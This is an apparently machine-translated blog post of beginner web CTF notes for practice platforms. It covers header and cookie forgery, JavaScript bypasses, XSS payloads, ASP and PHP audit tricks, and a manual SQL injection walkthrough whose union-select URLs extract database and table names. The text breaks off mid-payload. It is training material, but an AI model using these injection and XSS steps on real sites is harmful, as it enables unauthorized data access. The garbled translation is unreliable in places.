CTF Web Summary (Getting started)

This article link: http://blog.csdn.net/u012763794/article/details/50959166

This article based on their own experience and the practice of the major training platform constantly updated, if I recently lazy, not how to update, please remind me below or encourage me

Just as your own notes and just getting started in the children's shoes, Daniel do not spray Basic Article
1. View Source code directly
http://lab1.xseclab.com/base1_4a4d993ed7bd7d467b27af52d2aaa800/index.php

2. Modify or add an HTTP request header
Common are: referer source forgery
X-FORWARDED-FOR:IP Forged user-agent: User agent (what browser or whatever)
http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php
. NET version modifications, added later, such as version 9. NET CLR 9

Accept-language: Language
http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php
http://ctf1.shiyanbar.com/basic/header/
Modification of cookies
http://lab1.xseclab.com/base9_ab629d778e3a29540dfd60f2e548a5eb/index.php


3. View the HTTP request header or the response header
http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php
http://ctf1.shiyanbar.com/basic/catch/

4.302 jump to the relay page with informationhttp://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/index.php

5. View the developer Tools console
6.javascript Code Bypass
Bypass http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php by removing or modifying code or by local agent to change packets
7. Use Burp's repeater to view the entire HTTP packagehttp://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

8. Read the JavaScript code and get the correct password directly from the consoleHttp://ctf1.shiyanbar.com/basic/js/index.asp

9.robots.txt file Get informationThis would have been to the search engine to see the information, it is likely to expose the site structure directory http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b/index.php

10..bash_history, this should be said to have seen, is to record the user entered the Linux command
Front-End scripting classes
JS Plus decryptionhttp://ctf5.shiyanbar.com/DUTCTF/1.html//paste directly on the F12 console.

XSShttp://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php
The problem is a loophole, just enter the following on the command line.[JavaScript]View Plain copy $.post ("./getkey.php?ok=1", {' URL ': location.href, ' OK ': ok},function (data) {Console.log (data);   });   Showkey (); Simple direct input, of course.[JavaScript]View Plain copy <script>alert (Hackinglab) </script> This can also

That's the same question.
http://lab1.xseclab.com/realxss2_bcedaba7e8618cdfb51178765060fc7d/index.php
You can enter the jquery directly on the question, or you can do the following[HTML]View plain copy
http://lab1.xseclab.com/realxss3_9b28b0ff93d0b0099f5ac7f8bad3f368/index.php


Back-end scripting classes
Code Audits ASP code Audit:1.http://ctf8.shiyanbar.com/aspaudit/length limit: F12 Delete maxlength, or change length, local agent can bypass//username: ' Union select 1,1,1 from Bdmin ' , why is three columns, the general table will be set ID, plus account password 3, not to guess 4 ..., because the previous user name of the union is empty, so the result set is empty, so the final result set is only behind us 1,1,1, so in the password that input 1 is the password.
It's OK, anyway. Close tag ' union select 1,1,1 from Bdmin where ' 1 ' = ' 1
PHP Code Audit1.http://ctf8.shiyanbar.com/phpaudit///Actually this is the x-forwarded-for that modifies the HTTP request header 2.http://ctf1.shiyanbar.com/web/4/ index.php//With the following background landing type the first one, please see the following background landing type first
3.http://ctf5.shiyanbar.com/dutctf/index.php//two times UrlEncode
4.http://ctf1.shiyanbar.com/web/5/index.php//See background Landing type the second one
The hash value of the 5.http://ctf4.shiyanbar.com/web/false.php//array, which is null 6.http://ctf4.shiyanbar.com/web/session.php//only required infirst time CommitWhen the password= can be submitted directly, because the first time the server did not set the corresponding $_session[' password ', because it is = = comparison, the two are equal.

form Hiddenhttp://ctf10.shiyanbar.com:8888/main.php

SQL injection simple, straight on the tool, KO., such as Sqlmap, etc-—— 10 large SQL injection tools such as the following: 1.http://ctf5.shiyanbar.com:8080/9/asp.asp

2.http://ctf5.shiyanbar.com/8/index.php?id=1 of course not, and xx is also possible, the following is just an example[PHP]  View plain  copy//manual injection process   //Judgment injection type and Boolean injection    http://ctf5.shiyanbar.com/8/ index.php?id=1%20and%201=1   http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2  // Judging the number of fields    http://ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%203  /http/ ctf5.shiyanbar.com/8/index.php?id=1%20order%20by%202  //Get Database basic information (//CONCAT_WS is a string join function, where the first parameter is a delimiter, CHAR (58) is a colon, because the ASCII of the colon is ()    http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2%20union%20select% 201,concat_ws (CHAR), User (), database (), version ())    //Gets the table in the database, where table_schema can be understood as a database bar ( He is a field in the MySQL system table, here we use 16 binary notation, is the last sentence query to the database)    http://ctf5.shiyanbar.com/8/index.php?id=1%20and%201=2% 20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d795f6462   //Get fields for important tables    http://ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 union  Select 1,col